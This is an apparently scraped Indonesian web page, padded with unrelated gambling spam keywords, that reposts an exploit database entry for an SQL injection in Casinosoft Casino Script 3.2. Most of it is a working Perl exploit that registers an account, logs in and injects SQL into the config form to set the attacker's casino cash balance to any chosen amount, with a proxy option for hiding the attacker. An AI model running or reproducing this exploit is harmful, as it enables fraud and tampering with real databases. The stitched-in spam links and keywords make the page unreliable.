Casinosoft Casino Script 3.2 - Injeksi SQL 'config'

foxwoods resort casino address

lanus vs

BBM88

grill mobil

Rincian Eksploit

ID EDBCVEPenulisTipePlatformTanggal
28833CVE-2006-5446G1UKwebappsPHP2006-10-20

Casinosoft Casino Script rentan terhadap kerentanan injeksi SQL karena gagal membersihkan data yang diberikan pengguna sebelum digunakan dalam kueri SQL. Eksploitasi masalah ini dapat memungkinkan penyerang untuk mengompromikan aplikasi, mengakses atau mengubah data, atau mengeksploitasi kerentanan lain dalam implementasi basis data yang mendasarinya. Versi 3.2 rentan; versi lain mungkin juga terpengaruh.

Aplikasi rentan: Casinosoft Casino Script 3.2 (dan mungkin versi lain).

Sumber: SecurityFocus.

source: securityfocus Casino Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL queryting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementationn 3.2 is vulnerable; other versions may also be affected.#!/usr/bin/perl## Massvet ........ ...... - ......... .......... .......!## ........ ...... 3.2, ........ ..... ......, . .......... magicquotes## ......... .. ...... 3.2#### writed bu G1UK## CFTeamuse LWP::UserAgent;use Getopt::Std;use HTTP::Cookies;getopts("h:d:l:p:c:x:");$host = $opt_h;$dir = $opt_d || '/';$login = $opt_l;$pass = $opt_p;$cash = $opt_c;$proxy = $opt_x || '';logo();if(!$host||!$login||!$pass||!$cash) { help(); }print "=) server : $host \r\n";print "=) casino dir : $dir \r\n";print "=) login : $login \r\n";print "=) password : $pass \r\n";print "=) cash : $cash \r\n";print "\r\n";$cook = LWP::UserAgent->new() or die;$cookie = HTTP::Cookies->new();$cook->cookie_jar( $cookie );$url=$host.''.$dir;$cook->proxy('http'=>'http://'.$proxy) if $proxy;printf "Registering =)\r\n";$res = $cook->post('http://'.$url.'reg',["r_login" => "$login","r_pass" => "$pass","r_email" => "1","send" => "1","submit"=> "........."]);print "Registering OK\r\n";print "Enter =)\r\n";$res = $cook->post('http://'.$url.'lobby/login_proc.php',["log" => "$login","psw" => "$pass","send" => "1","submit"=> ".....","Cookie" => "PHPSESSID=".$sid]);print "Enter OK\r\n";print "Edit you cash =))\r\n";$res = $cook->post('http://'.$url.'lobby/config',["cpass" => "$pass","cname" => "","cfam" => "',cash='".$cash."' where login='".$login."'/*","send" => "1","Cookie" => "PHPSESSID=".$sid]);print "Check out you cash =)\r\n";sub logo(){print "<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\n";print "Massvet internet casino v3.2 sql injection cash exploit by CFTeam\r\n";print "<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\n";}sub help(){print "CFteam -h  -d [dir] -l  -p  -c  -x [proxy]\r\n\r\n";print " - Host where cazino installed for example - massvet\r\n";print "[dir] - Directory, where cazino is installed /cazino/ for example\r\n";print " - User name for registrate \r\n";print " - Password for registrate \r\n";print " - How much you need? (00.00)\r\n";print "[proxy] - For you safety \r\n";exit();}
casino script

▲ Kembali ke atas

Platform Lainnya

casino royale watch casio

1 deposit mobile casino

gemilang77 slot login

SEMPURNATOTO

Berita Piala Dunia

RAJASLOT99

slot 7777 mesin slot 77777

the crypt slot

open sim card slot

Jika Anda memiliki pertanyaan, silakan kirim email ke [email protected]

▲ Kembali ke atas